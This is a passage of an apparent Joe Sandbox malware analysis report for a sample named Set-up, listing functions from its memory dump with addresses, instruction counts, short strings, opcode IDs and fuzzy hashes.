                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79516771610B019BD324CF78C991763BBE3FFAA314F14952CC0569B785DB39A406C791
                                                                                                                                                                                                                                                              Function 02250D78 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 9Z%X
                                                                                                                                                                                                                                                              • API String ID: 0-1074776688
                                                                                                                                                                                                                                                              • Opcode ID: 42485f036d6cb090d72bcf21423c76f3585b224fcfcd55164796bb76a1d47f2b
                                                                                                                                                                                                                                                              • Instruction ID: e575e50da68fe0db20ec9ce0a20529b6483513c708f69f678621fab82b176dc6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42485f036d6cb090d72bcf21423c76f3585b224fcfcd55164796bb76a1d47f2b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F44149B69253215BE7249B94CC40B6BB7E9EFC9708F14C42CED89A7244DB32DE05CB81
                                                                                                                                                                                                                                                              Function 02241412 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: ;i<.
                                                                                                                                                                                                                                                              • API String ID: 0-3998032931
                                                                                                                                                                                                                                                              • Opcode ID: aedb2d03494c843c70d72e6200ec0e6d575eeda1136a59bdeccf50a77fd22bb1
                                                                                                                                                                                                                                                              • Instruction ID: 417895ae90a605b40c914a5ac2b7500722f4bb06945866e65d8565342479488d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aedb2d03494c843c70d72e6200ec0e6d575eeda1136a59bdeccf50a77fd22bb1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B84138A45093C38BE73A8B2984643B7BFD09FA3301F28189CE0DB5B241DB344059CB62
                                                                                                                                                                                                                                                              Function 02228983 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: gfff
                                                                                                                                                                                                                                                              • API String ID: 0-1553575800
                                                                                                                                                                                                                                                              • Opcode ID: 08e028d70ce33730815a4b455a975469d923b5617fa1e0a7598abd7a34374bab
                                                                                                                                                                                                                                                              • Instruction ID: 9568ef0ffd99655553af44b255884e851b93ede1c10437600b3b18b6a36603b0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08e028d70ce33730815a4b455a975469d923b5617fa1e0a7598abd7a34374bab
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2141FF77A245218BD72CCE78CC123AAB2D3ABC9311F4DC63DD945E7298EB78DC058681
                                                                                                                                                                                                                                                              Function 0221E4DE Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: p[6
                                                                                                                                                                                                                                                              • API String ID: 0-3915085856
                                                                                                                                                                                                                                                              • Opcode ID: 132f55778fba876926f3f62b34e2f429449372997c81464a5f02fdd776e6ecbb
                                                                                                                                                                                                                                                              • Instruction ID: a347e18f8411a2118161de6f3455716389cfd394a615b9b0fac98e7c5a667311
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 132f55778fba876926f3f62b34e2f429449372997c81464a5f02fdd776e6ecbb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96E012B4426204AFE304CF00DC88E7BBABCEB87A05F008429F24592201D7318809CB6A
                                                                                                                                                                                                                                                              Function 02232818 Relevance: .7, Instructions: 700COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 5b37b20168d9e9832352025bbf87434fc4884f63633731ae7d187d24574dabc5
                                                                                                                                                                                                                                                              • Instruction ID: 8e80ad001cc8a2af6047f280d8a7d3915a2ab1bac2fb3eeb2950c15281cafaa9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b37b20168d9e9832352025bbf87434fc4884f63633731ae7d187d24574dabc5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80626BB1608B818ED339CB3C8815797BFD5AB5A324F188B5DE0FA873D2C775A1018766
                                                                                                                                                                                                                                                              Function 02218138 Relevance: .7, Instructions: 665COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: ea13682cb1e47c9f2baa2ef244859542668660a37155063e3ed77d423b2d26b9
                                                                                                                                                                                                                                                              • Instruction ID: 242c1084603a08589d219b118b647dd9e9715642a044b34cba18a11ca4ece87a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea13682cb1e47c9f2baa2ef244859542668660a37155063e3ed77d423b2d26b9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F52D1B0918B859FFB31CB64C4C4BA7BBE1EB51310F184C2DC5EA0668AD3B9A585C743
                                                                                                                                                                                                                                                              Function 022241CA Relevance: .7, Instructions: 664COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: af3eeed05f600855ac44457e7374f18a20656ff2ab7ac7dda891f7a428eb3fc6
                                                                                                                                                                                                                                                              • Instruction ID: 1f30ee6ef4468008b9fe79db4013183a2647fefef9b6aa8cae3384c477d1ad84
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af3eeed05f600855ac44457e7374f18a20656ff2ab7ac7dda891f7a428eb3fc6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D14209B1A24B408FD714EF78C495366BBE2AF95310F088A3DD4EB87785D776A509CB02
                                                                                                                                                                                                                                                              Function 02218F18 Relevance: .6, Instructions: 615COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: ce536424ef0201b7ba14c585fe29a9fbd28fcf54060c4e8fec963405b32a477b
                                                                                                                                                                                                                                                              • Instruction ID: a12bfcc54e47e36178e20aec3d228fa2dba76934e35c2320506bce2ed1d1176c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce536424ef0201b7ba14c585fe29a9fbd28fcf54060c4e8fec963405b32a477b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 421206326283118BC734DF98D890BABB3E2FFD5309F29493DD98697284D774A495CB42
                                                                                                                                                                                                                                                              Function 02215128 Relevance: .6, Instructions: 600COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 95ad3c62b3d2a67a0a7069c0ca21ad6d783a87c932c53097ecfda1444977da47
                                                                                                                                                                                                                                                              • Instruction ID: 73a3f0b5840a5135560d48af843ce09fcbb169cba4b95356f8af137d3ce2ef46
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95ad3c62b3d2a67a0a7069c0ca21ad6d783a87c932c53097ecfda1444977da47
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C3244B0925B118FC338CF69C58096ABBF1BFA5310B904A6ED6A787E94D376F451CB10
                                                                                                                                                                                                                                                              Function 022172E8 Relevance: .5, Instructions: 539COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: b0ee6d58cdbb85691db39b5ea2623b633d84995f9a181ec80858cc2d69792633
                                                                                                                                                                                                                                                              • Instruction ID: 83bccf9a34c65e4008fe3722d923eeb22684f9902ac5262998ae3b2d86868a0c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0ee6d58cdbb85691db39b5ea2623b633d84995f9a181ec80858cc2d69792633
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC12E5356583418FC708CF69C88176AFBE6AFD9308F18986DE48587351D776D906CB82
                                                                                                                                                                                                                                                              Function 0224574D Relevance: .4, Instructions: 367COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 49082855967a4a1c5cb80e3b4474668023d4bde1e9466923e5d434d4d0515f26
                                                                                                                                                                                                                                                              • Instruction ID: 28a387747ec8f880f14cb5b1a4ffdd009ce88fcd312d0afe90bd634586da94a4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49082855967a4a1c5cb80e3b4474668023d4bde1e9466923e5d434d4d0515f26
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3E1FCB2519B804FD3368B78C8543A7BFE2AF91214F5C897DC4DB8738ADA79A105C711
                                                                                                                                                                                                                                                              Function 0224515C Relevance: .4, Instructions: 366COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 979dc930106294820c225660228cd957d5978f05ae9edbadb9ceec69bfb58daf
                                                                                                                                                                                                                                                              • Instruction ID: ad219df44129e25aacc2a8e6dddb267c3eca94dabbe6549d8916120e749b04b0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 979dc930106294820c225660228cd957d5978f05ae9edbadb9ceec69bfb58daf
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40E10972618B808FD326CB78C8543A7BFE26FA5204F5C897DC4DB87386DA79A105C715
                                                                                                                                                                                                                                                              Function 022574B8 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 823291f91ec24b8d69b86b058fe8a3e1baf3e4ace34e2331828cdb6162f49fd8
                                                                                                                                                                                                                                                              • Instruction ID: 982eaa19c8f6eec2d73ab5a1c3e027e61199fd374f40659a4c29d7289edcbd01
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 823291f91ec24b8d69b86b058fe8a3e1baf3e4ace34e2331828cdb6162f49fd8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20A10371A587218BC318CF68888066BF7E2ABC9328F19C72CECA55B3D9D7759C05C791
                                                                                                                                                                                                                                                              Function 02230408 Relevance: .3, Instructions: 337COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 96b695ea810561c2012d9efdee3133b763d6c19c15876f20dbf8fa84e85fb503
                                                                                                                                                                                                                                                              • Instruction ID: e02f98db820afb4b89a486b6e4b34e8bc5d73040f973c143661e9b387873cd79
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96b695ea810561c2012d9efdee3133b763d6c19c15876f20dbf8fa84e85fb503
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DB1E4B1924301BFD7118F64DC44B2ABBE2BFD4311F148A2DF898A32A4D771DA488F52
                                                                                                                                                                                                                                                              Function 02256B78 Relevance: .3, Instructions: 314COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 8c3f11439e7fdcb8f6d2916e898f6bc578a713d3bbe6cd039724d24de9c72420
                                                                                                                                                                                                                                                              • Instruction ID: 1e312a178a837acb6504548c24a172954c12c947739afa358be35fde70ebf13b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c3f11439e7fdcb8f6d2916e898f6bc578a713d3bbe6cd039724d24de9c72420
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8691F0715183228BC714DF68C850A2FB7E6EF89324F49CA2CE8D59B295DB34D8158782
                                                                                                                                                                                                                                                              Function 02224A90 Relevance: .3, Instructions: 309COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 60e55505bea664932bc595d0f30fd70be5e7a5f042936e4a4f864ace192799c7
                                                                                                                                                                                                                                                              • Instruction ID: c5827bca70a9e795afe76939244863ff289d26c90e77123c53ac8306ab478afd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60e55505bea664932bc595d0f30fd70be5e7a5f042936e4a4f864ace192799c7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9C1B3B1A24B008FD714EF78C485766BBE1AF55320F048A2DD8EAC7395E675E548CB42
                                                                                                                                                                                                                                                              Function 0224D9C0 Relevance: .3, Instructions: 307COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 94ef0ca5b8d6318958237ebe5e7a79209f0d0172ab7ba0c9c8523d2f4e86f7a1
                                                                                                                                                                                                                                                              • Instruction ID: 472f27489b1f9e250d0eae16542718b61c9d76967169ae52a5e628b15b99899a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94ef0ca5b8d6318958237ebe5e7a79209f0d0172ab7ba0c9c8523d2f4e86f7a1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2FD1BD215087D18ED326CB7C8848B457FD16B67224F4E83D8D4A95F3E7C7BA890AC792
                                                                                                                                                                                                                                                              Function 02217CA8 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 65bedac1f527403addecbfd8f22b79c48324f9e473bd8fbafd442d433d8df9d4
                                                                                                                                                                                                                                                              • Instruction ID: f69aee9a0a74d87175b2e7b52d369c729e59b83903acaed07b5126efef0ef528
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65bedac1f527403addecbfd8f22b79c48324f9e473bd8fbafd442d433d8df9d4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9DC15CB29587418FC370CF68CC96BABB7E1BF85318F084A2DD1D9C6242E778A155CB46
                                                                                                                                                                                                                                                              Function 02246832 Relevance: .3, Instructions: 296COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 45d146452327d5fe0d0b2857345051f38c40aedd03eb5ceb6af7434c2db1f4ef
                                                                                                                                                                                                                                                              • Instruction ID: c517d00aeb7170394147a2f5c9832bbd684b91852ae3e6d07a7f355a850b590d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45d146452327d5fe0d0b2857345051f38c40aedd03eb5ceb6af7434c2db1f4ef
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64C1B771A09F804BD3298A78C8543A7BFD29BD6224F1C8A7DC5EF473CADA796445C702
                                                                                                                                                                                                                                                              Function 02247D78 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 4809ba231517a0b7653863da1f2cd01f5157977206784de168eb57864b1c13a6
                                                                                                                                                                                                                                                              • Instruction ID: f28586c9018b5208c36c36eb424d6631b39426a8f29127eaa3772bceda32c19d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4809ba231517a0b7653863da1f2cd01f5157977206784de168eb57864b1c13a6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76911737B7999147D31C89BC4C223BAA9434BD7234F2EC36EA5F68B3E9DE5588014385
                                                                                                                                                                                                                                                              Function 022571A8 Relevance: .3, Instructions: 263COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 781f0c525034d88b225e76efe56fbb922a93a61a3136204fea15963cc88c254e
                                                                                                                                                                                                                                                              • Instruction ID: e5c05fd9361aa381165ce6491c076837bbc4d45effec2b2185519d8ce266ca77
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 781f0c525034d88b225e76efe56fbb922a93a61a3136204fea15963cc88c254e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A91DC342583269BC724DFA8C890A6AF7F1FF89314F14862CED958B2A5DB31E850CB41
                                                                                                                                                                                                                                                              Function 02230818 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 3772390d0fdcdbd559eca792487f2e7ab71ac0d4a635f7ebd349c9a824b37487
                                                                                                                                                                                                                                                              • Instruction ID: 41850c2d978566e5915d9b8bec647e21a7a5c36e1d4f55d041f87335031799c4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3772390d0fdcdbd559eca792487f2e7ab71ac0d4a635f7ebd349c9a824b37487
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B817E3376968047E339857C5C623AABA834BD2234F2DC76EE5F5C73E9D9998D018390
                                                                                                                                                                                                                                                              Function 02256EE8 Relevance: .2, Instructions: 246COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 2e1221477518c2a3ffafbfbfbbb44fb591e23b2234c7f41b660825d994ff9576
                                                                                                                                                                                                                                                              • Instruction ID: 79300f6413c3cb89a7c2f94ccfcb917875d58f3d7346782f7cfffaeea5370bea
